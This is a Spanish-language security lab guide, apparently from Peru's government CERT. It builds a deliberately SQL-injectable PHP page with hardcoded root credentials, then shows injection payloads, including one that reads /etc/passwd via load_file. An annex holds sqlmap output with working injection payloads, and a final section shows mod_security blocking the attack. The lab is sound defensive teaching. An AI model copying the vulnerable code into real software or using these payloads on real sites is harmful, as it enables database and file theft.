Sie sind auf Seite 1von 16

REQUISITOS

Los siguientes elementos de software son necesarios para la realización del laboratorio:

 MV con CentOS Linux 7


 MV con Windows 10

EJECUCIÓN DEL LABORATORIO


Tarea 1
Preparación del escenario de pruebas

Actividad 1

1. Iniciar el equipo CentOS Linux 7

2. Actualizar el sistema operativo

yum update

3. Instalar servicios.

yum install httpd mariadb-server php php-mysql

NOTA: Los paquetes están actualizados a la fecha (27/12/17)


MariaDB – 5.5.56
Apache - 2.4.3

4. Iniciar servicios.

systemctl start httpd


systemctl start mariadb

5. Verificar estado de los servicios.

systemctl status httpd


systemctl status mariadb

6. Configuración de contraseña de root.

mysql_secure_installation

7. Verificar acceso a MariaDB

mysqladmin -u root -p version

8. Configurar el firewall local para permitir el acceso al servidor Apache.

firewall-cmd --get-active-zones
firewall-cmd --zone=public --add-port=80/tcp --permanent
firewall-cmd –reload

9. Crear base de datos de prueba

mysql -u root -p

show databases;
CREATE DATABASE episodio1;
USE episodio1;

CREATE TABLE `blog` (


`id` int(11) DEFAULT NULL,
`content` varchar(100) DEFAULT NULL
);

INSERT INTO `blog` VALUES (1,'testing 1.. 2.. 3..');


INSERT INTO `blog` VALUES (2,'testing 2.. 3.. 4..');
INSERT INTO `blog` VALUES (3,'testing 3.. 4.. 5..');
select * from blog;
exit

10. Configurar el registro de actividades en el archivo /etc/my.cnf, añadiendo las siguientes


líneas:

[mysqld]
datadir=/var/lib/mysql
socket=/var/lib/mysql/mysql.sock
symbolic-links=0
#enable logging
general_log=1
general_log_file=/var/log/query.log

11. Crear el archivo de registro y definir propiedad del archivo de registro:

touch /var/log/query.log
chown mysql:mysql /var/log/query.log

12. Reiniciar MariaDB

service mysqld restart

13. Visualizar el archivo de registro

tail -f /var/log/query.log

14. Crear el archivo /var/www/html/blog.php


<?php

if (!$link = mysql_connect('localhost', 'root', '12345678')) {


echo 'Could not connect to mysql';
exit;
}

if (!mysql_select_db('episodio1', $link)) {
echo 'No se pudo seleccionar la base de datos episodio1';
exit;
}

$id = $_GET["id"];

$sql = "SELECT * FROM blog where id = '$id'";


$result = mysql_query($sql, $link);

if (!$result) {
echo "DB Error, no se pudo consultar la base de datos\n";
echo 'MySQL Error: ' . mysql_error();
exit;
}

while ($row = mysql_fetch_assoc($result)) {


echo $row['content'];
}

mysql_free_result($result);

?>

15. Cambiar propiedad del archivo /var/www/html/blog.php

chown apache:apache blog.php

16. Reiniciar servicios

systemctl restart httpd


systemctl restart mariadb

Tarea 2
Pruebas de inyección SQL

Actividad 1

1. Iniciar equipo con Windows 10

2. Abrir en navegador web y cargar la página web predeterminada


3. Pasemos al script blog.php y probemos algunos ejemplos.

/blog.php?id=1

4. Veamos qué podría hacer un atacante.

/blog.php?id=1' or id = '3
5. Podemos usar una función mysql incorporada llamada load_file para leer archivos del
sistema operativo y devolverlos a una declaración SQL.

/blog.php?id=1' UNION select 2, load_file("/etc/passwd")'

6. En el archivo de registro se muestra:


NOTA: Como se puede apreciar a pesar de tener actualizado el sistema operativo y los
servicios el ataque de inyección SQL es efectivo, esto debido a que no se implementan
las mejores prácticas en el desarrollo de las aplicaciones.

7. Probando con sqlmap se puede obtener el acceso a los datos de la tabla.


Tarea 3
Instalar mod_security

Actividad 1

1. Ir al equipo con CentOS Linux 7

yum install mod_security mod_security_crs

2. Reiniciar Apache

systemctl restart httpd

3. Probar consultas a la base de datos:

4. Visualizar el archivo de registro /var/log/httpd/error_log de Apache


5. Agregar la siguiente línea al archivo C:\Windows\System32\drivers\etc\hosts:

172.16.1.4 www.prueba.com.pe

6. Probar nuevamente:

7. Veamos qué podría hacer un atacante ahora:

/blog.php?id=1' or id = '3
8. Se podrá ver el archivo /etc/passwd

9. El archivo de registro /var/log/httpd/error_log que muestra:


10. Probando con sqlmap podemos apreciar que no puede acceder pues el WAF está
bloqueando la vulnerabilidad.
Anexo 1

root@PeCERT-002:~# sqlmap -u www.prueba.com.pe/blog.php?id=1 --dbs


___
__H__
___ ___["]_____ ___ ___ {1.1.12#stable}
|_ -| . [(] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is
illegal. It is the end user's responsibility to obey all applicable local, state and federal
laws. Developers assume no liability and are not responsible for any misuse or damage caused
by this program

[*] starting at 14:04:19

[14:04:19] [INFO] resuming back-end DBMS 'mysql'


[14:04:19] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 6424=6424 AND 'ihFB'='ihFB

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3041 FROM(SELECT COUNT(*),CONCAT(0x717a787171,(SELECT
(ELT(3041=3041,1))),0x716b6a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY
x)a) AND 'Qszm'='Qszm

Type: AND/OR time-based blind


Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'Izqz'='Izqz

Type: UNION query


Title: Generic UNION query (NULL) - 2 columns
Payload: id=1' UNION ALL SELECT
NULL,CONCAT(0x717a787171,0x416d5a5a4d685876417a745a427377627273716d7a5a70766f49765859784a725
36f634f7a566d64,0x716b6a7871)-- xkVn
---
[14:04:19] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL >= 5.0
[14:04:19] [INFO] fetching database names
available databases [5]:
[*] episodio1
[*] information_schema
[*] mysql
[*] performance_schema
[*] test

[14:04:19] [INFO] fetched data logged to text files under


'/root/.sqlmap/output/www.prueba.com.pe'

[*] shutting down at 14:04:19

root@PeCERT-002:~# sqlmap -u www.prueba.com.pe/blog.php?id=1 -D episodio1 --tables


___
__H__
___ ___[,]_____ ___ ___ {1.1.12#stable}
|_ -| . [)] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is
illegal. It is the end user's responsibility to obey all applicable local, state and federal
laws. Developers assume no liability and are not responsible for any misuse or damage caused
by this program

[*] starting at 14:08:42

[14:08:42] [INFO] resuming back-end DBMS 'mysql'


[14:08:42] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 6424=6424 AND 'ihFB'='ihFB

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3041 FROM(SELECT COUNT(*),CONCAT(0x717a787171,(SELECT
(ELT(3041=3041,1))),0x716b6a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY
x)a) AND 'Qszm'='Qszm

Type: AND/OR time-based blind


Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'Izqz'='Izqz

Type: UNION query


Title: Generic UNION query (NULL) - 2 columns
Payload: id=1' UNION ALL SELECT
NULL,CONCAT(0x717a787171,0x416d5a5a4d685876417a745a427377627273716d7a5a70766f49765859784a725
36f634f7a566d64,0x716b6a7871)-- xkVn
---
[14:08:42] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL >= 5.0
[14:08:42] [INFO] fetching tables for database: 'episodio1'
Database: episodio1
[1 table]
+------+
| blog |
+------+

[14:08:42] [INFO] fetched data logged to text files under


'/root/.sqlmap/output/www.prueba.com.pe'

[*] shutting down at 14:08:42

root@PeCERT-002:~# sqlmap -u www.prueba.com.pe/blog.php?id=1 -D episodio1 -T blog --columns


___
__H__
___ ___[)]_____ ___ ___ {1.1.12#stable}
|_ -| . ["] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is
illegal. It is the end user's responsibility to obey all applicable local, state and federal
laws. Developers assume no liability and are not responsible for any misuse or damage caused
by this program

[*] starting at 14:09:01

[14:09:02] [INFO] resuming back-end DBMS 'mysql'


[14:09:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 6424=6424 AND 'ihFB'='ihFB
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3041 FROM(SELECT COUNT(*),CONCAT(0x717a787171,(SELECT
(ELT(3041=3041,1))),0x716b6a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY
x)a) AND 'Qszm'='Qszm

Type: AND/OR time-based blind


Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'Izqz'='Izqz

Type: UNION query


Title: Generic UNION query (NULL) - 2 columns
Payload: id=1' UNION ALL SELECT
NULL,CONCAT(0x717a787171,0x416d5a5a4d685876417a745a427377627273716d7a5a70766f49765859784a725
36f634f7a566d64,0x716b6a7871)-- xkVn
---
[14:09:02] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL >= 5.0
[14:09:02] [INFO] fetching columns for table 'blog' in database 'episodio1'
Database: episodio1
Table: blog
[2 columns]
+---------+--------------+
| Column | Type |
+---------+--------------+
| content | varchar(100) |
| id | int(11) |
+---------+--------------+

[14:09:02] [INFO] fetched data logged to text files under


'/root/.sqlmap/output/www.prueba.com.pe'

[*] shutting down at 14:09:02

root@PeCERT-002:~# sqlmap -u www.prueba.com.pe/blog.php?id=1 -D episodio1 -T blog -C id --


dump
___
__H__
___ ___[']_____ ___ ___ {1.1.12#stable}
|_ -| . ['] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is
illegal. It is the end user's responsibility to obey all applicable local, state and federal
laws. Developers assume no liability and are not responsible for any misuse or damage caused
by this program

[*] starting at 14:09:23

[14:09:23] [INFO] resuming back-end DBMS 'mysql'


[14:09:23] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 6424=6424 AND 'ihFB'='ihFB

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3041 FROM(SELECT COUNT(*),CONCAT(0x717a787171,(SELECT
(ELT(3041=3041,1))),0x716b6a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY
x)a) AND 'Qszm'='Qszm

Type: AND/OR time-based blind


Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'Izqz'='Izqz
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=1' UNION ALL SELECT
NULL,CONCAT(0x717a787171,0x416d5a5a4d685876417a745a427377627273716d7a5a70766f49765859784a725
36f634f7a566d64,0x716b6a7871)-- xkVn
---
[14:09:23] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL >= 5.0
[14:09:23] [INFO] fetching entries of column(s) 'id' for table 'blog' in database
'episodio1'
Database: episodio1
Table: blog
[3 entries]
+----+
| id |
+----+
| 3 |
| 1 |
| 2 |
+----+

[14:09:23] [INFO] table 'episodio1.blog' dumped to CSV file


'/root/.sqlmap/output/www.prueba.com.pe/dump/episodio1/blog.csv'
[14:09:23] [INFO] fetched data logged to text files under
'/root/.sqlmap/output/www.prueba.com.pe'

[*] shutting down at 14:09:23

root@PeCERT-002:~#
Jr. Carabaya cuadra 1 s/n - Lima (Palacio de Gobierno).
Central Telefónica: (51 1) 219 7000 Anexos 5111 5129
e-mail: pecert@pcm.gob.pe
mfrayssinet@pcm.gob.pe